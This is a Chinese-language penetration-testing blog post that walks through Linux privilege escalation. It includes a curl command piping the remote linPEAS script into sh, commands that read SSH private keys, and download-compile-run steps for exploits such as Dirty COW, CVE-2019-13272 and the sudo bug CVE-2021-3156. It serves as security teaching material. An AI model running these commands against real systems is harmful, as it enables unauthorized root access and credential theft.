<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/1.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/1.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"onlycare.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Linux提权成殇Orz10x00 Linux提权信息收集1curl https:&#x2F;&#x2F;raw.githubusercontent.com&#x2F;carlospolop&#x2F;privilege-escalation-awesome-scripts-suite&#x2F;master&#x2F;linPEAS&#x2F;linpeas.sh | sh  1. 操作系统信息12345cat &#x2F;etc&#x2F;issuecat &#x2F;etc&#x2F;*-relea">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux提权">
<meta property="og:url" content="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="成殇のBlog">
<meta property="og:description" content="Linux提权成殇Orz10x00 Linux提权信息收集1curl https:&#x2F;&#x2F;raw.githubusercontent.com&#x2F;carlospolop&#x2F;privilege-escalation-awesome-scripts-suite&#x2F;master&#x2F;linPEAS&#x2F;linpeas.sh | sh  1. 操作系统信息12345cat &#x2F;etc&#x2F;issuecat &#x2F;etc&#x2F;*-relea">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/1.png">
<meta property="og:image" content="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/2.png">
<meta property="og:image" content="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/3.png">
<meta property="og:image" content="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/4.png">
<meta property="og:image" content="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/5.png">
<meta property="og:image" content="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/6.png">
<meta property="og:image" content="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/7.png">
<meta property="og:image" content="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/8.png">
<meta property="og:image" content="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/9.png">
<meta property="article:published_time" content="2022-09-08T16:09:42.000Z">
<meta property="article:modified_time" content="2023-05-18T07:48:18.434Z">
<meta property="article:author" content="成殇Orz1">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/1.png">

<link rel="canonical" href="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Linux提权 | 成殇のBlog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage">
  

  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">成殇のBlog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/onlycare" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://onlycare.github.io/2022/09/09/Linux%E6%8F%90%E6%9D%83/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/2.png">
      <meta itemprop="name" content="成殇Orz1">
      <meta itemprop="description" content="菜鸡一枚">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="成殇のBlog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Linux提权
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-09-09 00:09:42" itemprop="dateCreated datePublished" datetime="2022-09-09T00:09:42+08:00">2022-09-09</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-05-18 15:48:18" itemprop="dateModified" datetime="2023-05-18T15:48:18+08:00">2023-05-18</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>6.5k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>6 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="Linux提权"><a href="#Linux提权" class="headerlink" title="Linux提权"></a>Linux提权</h1><h4 id="成殇Orz1"><a href="#成殇Orz1" class="headerlink" title="成殇Orz1"></a>成殇Orz1</h4><h3 id="0x00-Linux提权信息收集"><a href="#0x00-Linux提权信息收集" class="headerlink" title="0x00 Linux提权信息收集"></a>0x00 Linux提权信息收集</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh</span><br></pre></td></tr></table></figure>

<h5 id="1-操作系统信息"><a href="#1-操作系统信息" class="headerlink" title="1. 操作系统信息"></a>1. 操作系统信息</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">cat /etc/issue</span><br><span class="line">cat /etc/*-release</span><br><span class="line">lsb_release -a</span><br><span class="line">uname –a</span><br><span class="line">uname –mrs</span><br></pre></td></tr></table></figure>

<span id="more"></span>

<h5 id="2-环境变量"><a href="#2-环境变量" class="headerlink" title="2. 环境变量"></a>2. 环境变量</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">cat /etc/profile </span><br><span class="line">cat /etc/bashrc </span><br><span class="line">cat ~/.bash_profile </span><br><span class="line">cat ~/.bashrc </span><br><span class="line">cat ~/.bash_logout </span><br><span class="line">env </span><br><span class="line"><span class="built_in">set</span></span><br></pre></td></tr></table></figure>

<h5 id="3-网络信息"><a href="#3-网络信息" class="headerlink" title="3. 网络信息"></a>3. 网络信息</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ifconfig -a</span><br><span class="line">cat /etc/network/interfaces</span><br><span class="line">cat /etc/sysconfig/network</span><br></pre></td></tr></table></figure>

<h5 id="4-服务信息"><a href="#4-服务信息" class="headerlink" title="4. 服务信息"></a>4. 服务信息</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ps aux</span><br><span class="line">ps -elf</span><br><span class="line">top</span><br></pre></td></tr></table></figure>

<h5 id="5-应用程序信息"><a href="#5-应用程序信息" class="headerlink" title="5 应用程序信息"></a>5 应用程序信息</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ls -alh /sbin/</span><br><span class="line">dpkg -l</span><br><span class="line">rpm -qa</span><br><span class="line">ls -alh /var/cache/apt/archives</span><br><span class="line">ls -alh /var/cache/yum/</span><br></pre></td></tr></table></figure>

<h5 id="6-登录用户"><a href="#6-登录用户" class="headerlink" title="6. 登录用户"></a>6. 登录用户</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">id</span><br><span class="line">who</span><br><span class="line">w</span><br><span class="line">last</span><br></pre></td></tr></table></figure>

<h5 id="7-计划任务"><a href="#7-计划任务" class="headerlink" title="7. 计划任务"></a>7. 计划任务</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">crontab -l</span><br><span class="line">cat /etc/cron*</span><br></pre></td></tr></table></figure>

<h5 id="8-SSH密钥信息"><a href="#8-SSH密钥信息" class="headerlink" title="8. SSH密钥信息"></a>8. SSH密钥信息</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cat ~/.ssh/authorized_keys</span><br><span class="line">cat ~/.ssh/id_rsa.pub</span><br><span class="line">cat ~/.ssh/id_rsa</span><br></pre></td></tr></table></figure>

<h5 id="9-系统通信"><a href="#9-系统通信" class="headerlink" title="9. 系统通信"></a>9. 系统通信</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">lsof -i</span><br><span class="line">lsof -i :80</span><br><span class="line">grep 80 /etc/services</span><br><span class="line">netstat -antup</span><br><span class="line">netstat -antpx</span><br><span class="line">netstat -tulpn</span><br><span class="line">chkconfig --list</span><br><span class="line">chkconfig --list | grep 3:on</span><br><span class="line">last</span><br><span class="line">w</span><br></pre></td></tr></table></figure>

<h5 id="10-日志文件分析"><a href="#10-日志文件分析" class="headerlink" title="10. 日志文件分析"></a>10. 日志文件分析</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cat /etc/httpd/logs/access_log</span><br><span class="line">cat /etc/httpd/logs/error_log</span><br><span class="line">cat /var/<span class="built_in">log</span>/apache2/access_log</span><br><span class="line">cat /var/<span class="built_in">log</span>/apache2/error_log</span><br></pre></td></tr></table></figure>

<h5 id="11-语言开发环境"><a href="#11-语言开发环境" class="headerlink" title="11. 语言开发环境"></a>11. 语言开发环境</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">find / -name perl*</span><br><span class="line">find / -name python*</span><br><span class="line">find / -name gcc*</span><br><span class="line">find / -name cc</span><br></pre></td></tr></table></figure>

<h5 id="12-上传文件环境"><a href="#12-上传文件环境" class="headerlink" title="12. 上传文件环境"></a>12. 上传文件环境</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">find / -name wget</span><br><span class="line">find / -name nc*</span><br><span class="line">find / -name netcat*</span><br><span class="line">find / -name tftp*</span><br><span class="line">find / -name ftp</span><br></pre></td></tr></table></figure>

<h3 id="0x01-searchsploit"><a href="#0x01-searchsploit" class="headerlink" title="0x01 searchsploit"></a>0x01 searchsploit</h3><p>searchsploit是一个用于 Exploit-DB 的命令行搜索工具</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">下载与安装：</span><br><span class="line">git <span class="built_in">clone</span> https://github.com/offensive-security/exploit-database.git</span><br><span class="line">centos：	yum -y install exploitdb</span><br><span class="line">macos：	brew update &amp;&amp; brew install exploitdb</span><br><span class="line">kali：	apt update &amp;&amp; apt install exploitdb</span><br></pre></td></tr></table></figure>

<h5 id="1-searchsploit搜索exp"><a href="#1-searchsploit搜索exp" class="headerlink" title="1. searchsploit搜索exp"></a>1. searchsploit搜索exp</h5><p>基本搜索：会匹配标题和路径中的内</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit smb windows remote</span><br></pre></td></tr></table></figure>

<p>标题搜索: 只匹配标题,不会对路径中的关键词进行匹配 </p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">searchsploit -t smb windows remote</span> </span><br></pre></td></tr></table></figure>

<p>复制到剪贴板 -p参数可以获取更多关于该漏洞的信息,以及将完整的路径复制到剪贴板上 </p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit -<span class="selector-tag">p</span> <span class="number">42315</span><span class="selector-class">.py</span> </span><br></pre></td></tr></table></figure>

<p>复制到文件夹 不建议在本地的漏洞数据库中修改exp,建议使用-m参数复制那些有用的到当前的工作目录</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">searchsploit</span> -m <span class="number">42315</span>.py</span><br></pre></td></tr></table></figure>

<h3 id="0x02-Linux系统内核漏洞提权"><a href="#0x02-Linux系统内核漏洞提权" class="headerlink" title="0x02 Linux系统内核漏洞提权"></a>0x02 Linux系统内核漏洞提权</h3><blockquote>
<p>Linux-kernel-exploits（Linux平台提权漏洞集合）</p>
<p><a target="_blank" rel="noopener" href="https://github.com/SecWiki/linux-kernel-exploits">https://github.com/SecWiki/linux-kernel-exploits</a></p>
</blockquote>
<h5 id="2-1-脏牛提权"><a href="#2-1-脏牛提权" class="headerlink" title="2.1 脏牛提权"></a>2.1 脏牛提权</h5><p>漏洞编号：CVE-2016-5195 </p>
<p>漏洞名称：脏牛（Dirty COW） </p>
<p>漏洞危害：低权限用户利用该漏洞技术可以在 Linux 系统上实现本地提权</p>
<p>影响范围：Linux 内核2.6.22 &lt; 3.9 (x86/x64)</p>
<p>POC： <a target="_blank" rel="noopener" href="https://github.com/FireFart/dirtycow">https://github.com/FireFart/dirtycow</a></p>
<p>gcc编译：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -pthread ditry.c –o dirty –lcrypt</span><br></pre></td></tr></table></figure>

<p>替换root用户：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./dirty password</span><br></pre></td></tr></table></figure>

<h5 id="2-2-pkexec-提权漏洞"><a href="#2-2-pkexec-提权漏洞" class="headerlink" title="2.2 pkexec 提权漏洞"></a>2.2 pkexec 提权漏洞</h5><p>漏洞编号：CVE-2019-13272</p>
<p>漏洞范围： 4.10 &lt; linux内核版本 &lt; 5.1.17 </p>
<p>exploitdb： <a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/47163">https://www.exploit-db.com/exploits/47163</a> </p>
<p>利用exp： <a target="_blank" rel="noopener" href="https://www.exploit-db.com/download/47163">https://www.exploit-db.com/download/47163</a></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="regexp">//</span> Tested on:</span><br><span class="line"><span class="regexp">//</span> - Ubuntu <span class="number">16.04</span>.<span class="number">5</span> kernel <span class="number">4.15</span>.<span class="number">0</span>-<span class="number">29</span>-generic</span><br><span class="line"><span class="regexp">//</span> - Ubuntu <span class="number">18.04</span>.<span class="number">1</span> kernel <span class="number">4.15</span>.<span class="number">0</span>-<span class="number">20</span>-generic</span><br><span class="line"><span class="regexp">//</span> - Ubuntu <span class="number">19.04</span> kernel <span class="number">5.0</span>.<span class="number">0</span>-<span class="number">15</span>-generic</span><br><span class="line"><span class="regexp">//</span> - Ubuntu Mate <span class="number">18.04</span>.<span class="number">2</span> kernel <span class="number">4.18</span>.<span class="number">0</span>-<span class="number">15</span>-generic</span><br><span class="line"><span class="regexp">//</span> - Linux Mint <span class="number">19</span> kernel <span class="number">4.15</span>.<span class="number">0</span>-<span class="number">20</span>-generic</span><br><span class="line"><span class="regexp">//</span> - Xubuntu <span class="number">16.04</span>.<span class="number">4</span> kernel <span class="number">4.13</span>.<span class="number">0</span>-<span class="number">36</span>-generic</span><br><span class="line"><span class="regexp">//</span> - ElementaryOS <span class="number">0.4</span>.<span class="number">1</span> <span class="number">4.8</span>.<span class="number">0</span>-<span class="number">52</span>-generic</span><br><span class="line"><span class="regexp">//</span> - Backbox <span class="number">6</span> kernel <span class="number">4.18</span>.<span class="number">0</span>-<span class="number">21</span>-generic</span><br><span class="line"><span class="regexp">//</span> - Parrot OS <span class="number">4.5</span>.<span class="number">1</span> kernel <span class="number">4.19</span>.<span class="number">0</span>-parrot1-<span class="number">13</span>t-amd64</span><br><span class="line"><span class="regexp">//</span> - Kali kernel <span class="number">4.19</span>.<span class="number">0</span>-kali5-amd64</span><br><span class="line"><span class="regexp">//</span> - Redcore <span class="number">1806</span> (LXQT) kernel <span class="number">4.16</span>.<span class="number">16</span>-redcore</span><br><span class="line"><span class="regexp">//</span> - MX <span class="number">18.3</span> kernel <span class="number">4.19</span>.<span class="number">37</span>-<span class="number">2</span>~mx17+<span class="number">1</span></span><br><span class="line"><span class="regexp">//</span> - RHEL <span class="number">8.0</span> kernel <span class="number">4.18</span>.<span class="number">0</span>-<span class="number">80</span>.el8.x86_64</span><br><span class="line"><span class="regexp">//</span> - Debian <span class="number">9.4</span>.<span class="number">0</span> kernel <span class="number">4.9</span>.<span class="number">0</span>-<span class="number">6</span>-amd64</span><br><span class="line"><span class="regexp">//</span> - Debian <span class="number">10.0</span>.<span class="number">0</span> kernel <span class="number">4.19</span>.<span class="number">0</span>-<span class="number">5</span>-amd64</span><br><span class="line"><span class="regexp">//</span> - Devuan <span class="number">2.0</span>.<span class="number">0</span> kernel <span class="number">4.9</span>.<span class="number">0</span>-<span class="number">6</span>-amd64</span><br><span class="line"><span class="regexp">//</span> - SparkyLinux <span class="number">5.8</span> kernel <span class="number">4.19</span>.<span class="number">0</span>-<span class="number">5</span>-amd64</span><br><span class="line"><span class="regexp">//</span> - Fedora Workstation <span class="number">30</span> kernel <span class="number">5.0</span>.<span class="number">9</span>-<span class="number">301</span>.fc30.x86_64</span><br><span class="line"><span class="regexp">//</span> - Manjaro <span class="number">18.0</span>.<span class="number">3</span> kernel <span class="number">4.19</span>.<span class="number">23</span>-<span class="number">1</span>-MANJARO</span><br><span class="line"><span class="regexp">//</span> - Mageia <span class="number">6</span> kernel <span class="number">4.9</span>.<span class="number">35</span>-desktop-<span class="number">1</span>.mga6</span><br><span class="line"><span class="regexp">//</span> - Antergos <span class="number">18.7</span> kernel <span class="number">4.17</span>.<span class="number">6</span>-<span class="number">1</span>-ARCH</span><br></pre></td></tr></table></figure>

<h5 id="2-3-CVE-2019-13272"><a href="#2-3-CVE-2019-13272" class="headerlink" title="2.3 CVE-2019-13272"></a>2.3 CVE-2019-13272</h5><p>漏洞范围： Linux Kernel &lt; 5.1.17</p>
<p>exploitdb： <a target="_blank" rel="noopener" href="https://www.exploit-db.com/download/47163">https://www.exploit-db.com/download/47163</a></p>
<p>利用exp： <a target="_blank" rel="noopener" href="https://github.com/CrisWang/Exploit-Virtual-Machine/blob/master/Linux/01-CVE-2019-13272.c">https://github.com/CrisWang/Exploit-Virtual-Machine/blob/master/Linux/01-CVE-2019-13272.c</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">wget https://www.exploit-db.com/download/47163 -O exp.c</span><br><span class="line">gcc exp.c –o exp</span><br><span class="line">./exp</span><br></pre></td></tr></table></figure>

<h5 id="2-4-CVE-2019-7304"><a href="#2-4-CVE-2019-7304" class="headerlink" title="2.4 CVE-2019-7304"></a>2.4 CVE-2019-7304</h5><p>漏洞范围： </p>
<p>​    Ubuntu版本范围：Ubuntu 18.10 Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 LTS</p>
<p>​    snap版本范围： 2.28 &lt; snapd &lt; 2.37</p>
<p>利用exp：<a target="_blank" rel="noopener" href="https://github.com/initstring/dirty_sock">https://github.com/initstring/dirty_sock</a></p>
<h5 id="2-5-Linux-sudo权限提升漏洞"><a href="#2-5-Linux-sudo权限提升漏洞" class="headerlink" title="2.5 Linux sudo权限提升漏洞"></a>2.5 Linux sudo权限提升漏洞</h5><p>漏洞编号：CVE-2021-3156 </p>
<p>影响版本：sudo 1.8.2-1.8.31p2、sudo 1.9.0-1.9.5p1</p>
<p>漏洞检测：sudoedit -s / </p>
<p>如果返回以sudoedit:开头的错误，则当前系统可能存在安全风险； 显示以usage:开头的错误，则无漏洞风险</p>
<p>漏洞利用：<a target="_blank" rel="noopener" href="https://github.com/blasty/CVE-2021-3156.git">https://github.com/blasty/CVE-2021-3156.git</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> CVE-2020-1356/</span><br><span class="line">make</span><br><span class="line">./sudo</span><br><span class="line">./sudo-hax-me-a-sandwich</span><br><span class="line">./sudo-hax-me-a-sandwich &lt;target_number&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x03-Linux环境变量提权"><a href="#0x03-Linux环境变量提权" class="headerlink" title="0x03 Linux环境变量提权"></a>0x03 Linux环境变量提权</h3><h5 id="3-1-PATH环境变量"><a href="#3-1-PATH环境变量" class="headerlink" title="3.1 PATH环境变量"></a>3.1 PATH环境变量</h5><p>PATH是Linux和类Unix操作系统中的环境变量，它指定存储可执行程序的所有bin和sbin目录。当用户在终端上执 行任何命令时，它会通过PATH变量来响应用户执行的命令，并向shell发送请求以搜索可执行文件。</p>
<p>suid权限说明：</p>
<ol>
<li>启动为进程之后，其进程的属主为原程序文件的属主 </li>
<li>只能作用在二进制程序上,不能作用在脚本上,且设置在目录上无意义 </li>
<li>执行suid权限的程序时,此用户将继承此程序的所有者权限</li>
</ol>
<h5 id="3-2-步骤"><a href="#3-2-步骤" class="headerlink" title="3.2 步骤"></a>3.2 步骤</h5><p>find命令查找拥有suid权限的文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p><img src="/2022/09/09/Linux%E6%8F%90%E6%9D%83/1.png"></p>
